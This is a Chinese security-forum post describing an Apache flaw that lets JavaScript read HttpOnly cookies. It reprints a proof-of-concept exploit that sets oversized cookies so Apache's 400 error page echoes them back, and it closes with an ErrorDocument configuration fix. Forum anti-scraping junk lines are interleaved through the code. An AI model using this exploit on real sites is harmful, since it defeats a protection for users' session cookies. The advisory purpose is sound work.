中国网络渗透测试联盟
标题:
Apache HttpOnly Cookie XSS跨站漏洞
[打印本页]
作者:
admin
时间:
2013-4-19 19:15
标题:
Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
! b8 p, i7 h7 D$ v% E2 @; N! `
5 h J9 b0 Y- g# Y( t
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
+ H& H, F: g2 F4 j
/ n' C) [+ y4 X5 }* H
7 p- E+ C- A* W* ?2 }9 t
//
http://www.exploit-db.com/exploits/18442/
3 K: Z/ R0 a) }% T, j
function setCookies (good) {
, Y) _, F6 S8 @2 Z8 n/ Q6 K
// Construct string for cookie value
% d" \% K1 { }6 W* Y& l' W( N5 a3 n
var str = "";
2 j( _) L2 j- k% ]# s% t8 T
for (var i=0; i< 819; i++) {
& W6 V: J; v; w) D; ~# u+ e, ]0 @
str += "x";
w7 a# C/ L* v3 h0 u
}
% d) u a% N4 T$ Y+ r1 z
// Set cookies
5 w$ h) x! W! k' \+ [ o1 t
for (i = 0; i < 10; i++) {
- b6 s: {# O+ l3 l$ u+ _
// Expire evil cookie
6 X0 N. C9 r4 [! k7 u- y3 Y0 K$ T N. }9 I
if (good) {
/ U) k" B T! o$ E! }2 N% x
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
5 b) v( S4 @* _7 D3 Y; N5 c
}
# {' h( p8 R4 I( S
// Set evil cookie
# S+ F% W2 E3 P
else {
) e6 e: @2 z( e: v1 r" r: E
var cookie = "xss"+i+"="+str+";path=/";
/ L7 I0 z, a7 N, n+ m2 b
}
; q# D$ k3 z2 z. |" Y0 z
document.cookie = cookie;
; q9 C: Y0 f: Y1 z6 U: o3 E
}
m* N* N: u- k1 D6 |
}
8 G1 A8 k" v# g' @
function makeRequest() {
6 q. e; t7 D$ W! x
setCookies();
9 B/ d* n3 J- Q. H/ L
function parseCookies () {
# j$ Q2 w4 u; [5 M; Z; w7 K
var cookie_dict = {};
0 L- J1 U4 o# r6 D. P' c" g
// Only react on 400 status
. j& j" z7 } g7 ^: H" O
if (xhr.readyState === 4 && xhr.status === 400) {
( ^0 N, v$ A. Q, {& B; x
// Replace newlines and match <pre> content
, C+ S/ {$ Q6 f& X d
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
" L" I! D5 T: h
if (content.length) {
& W% g9 P# R. X5 u
// Remove Cookie: prefix
9 ~5 E6 H' ] T; m5 ^* Z
content = content[1].replace("Cookie: ", "");
& X* g% p9 Z: b0 t
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
: f# W: S, T1 l/ W* L+ `
// Add cookies to object
) W( z5 F$ Q& A& ~
for (var i=0; i<cookies.length; i++) {
9 C# p5 V8 ?$ _" n, _# r/ f
var s_c = cookies
.split('=',2);
9 \2 n9 ^' g* t3 T7 A$ H- Y
cookie_dict[s_c[0]] = s_c[1];
: B: L" d/ h p& \1 @% c# e
}
; g) h5 ]! M3 j0 }0 T
}
$ p. t9 c2 a5 ?5 Z, R3 t. X
// Unset malicious cookies
) u; ~6 ?$ {% R
setCookies(true);
5 K- X; m% M& [+ q4 y' z1 y: e
alert(JSON.stringify(cookie_dict));
% o* b% ]. k+ a4 r4 ]5 ^9 a. x6 d& L
}
: y/ ~5 x; _, p% a7 M5 `2 R; E1 E
}
# P/ n: s+ U( s% a
// Make XHR request
2 _( v/ j# Z4 {' b
var xhr = new XMLHttpRequest();
4 A" W$ c8 c# r4 h) B) k
xhr.onreadystatechange = parseCookies;
7 [) E$ ]; n6 C6 A( v
xhr.open("GET", "/", true);
* @% d! j I) ^- l$ c6 ]9 u$ v. [4 N
xhr.send(null);
# M) J* {1 G9 ?8 I: z, p1 M
}
$ q! p( q5 M" |. p3 f/ L
makeRequest();
' I9 K, E- k: m8 T( O
4 P7 \+ w r: J, F9 L
你就能看见华丽丽的400错误包含着cookie信息。
, N A/ M y, k9 L0 l6 z
' {$ J9 F$ d8 b6 D* p
下载地址:
https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
1 M! R Q9 _- U; Y
: q% T+ P( M$ |3 G4 y0 O
修复方案:
+ y6 c! j4 ]" i8 E0 z8 h2 o1 Q- U
1 s* P8 h' a. K4 `/ ?" U5 f7 T5 G
Apache官方提供4种错误处理方式(
http://httpd.apache.org/docs/2.0/mod/core.html#errordocument
),如下
* G& W" I2 F" B, I! H4 e
7 \0 w* E5 w' X* p
In the event of a problem or error, Apachecan be configured to do one of four things,
" O, W( k7 p/ Y8 ]( m
8 f2 w) L: x: N9 p: n2 c5 o x
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
9 A+ z4 g, o: o% Q: _
2. output acustomized message输出一段信息
. c0 I. h; t% \0 ?; z& n. y
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
9 ?: R% S- J* C1 w1 K- Z
4. redirect to an external URL to handle theproblem/error转向一个外部URL
4 B9 ?. ^6 `+ ?
& W9 N. L4 N, q2 T
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
, k: \# X- n0 U! K: _
8 G) L' m5 P8 h; [
Apache配置:
2 H8 A7 {8 @- m8 o9 }
3 `( m' n6 G1 {! i0 e
ErrorDocument400 " security test"
0 q A* k1 L) I1 O4 }
; v O1 S. g7 O" ^# \0 n
当然,升级apache到最新也可:)。
- u5 `8 u3 K" I
' i- V8 n2 b; A
参考:
http://httpd.apache.org/security/vulnerabilities_22.html
- v D8 N4 n- p; v3 j# s5 g% v9 |
6 b9 l& G( s' f$ D
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2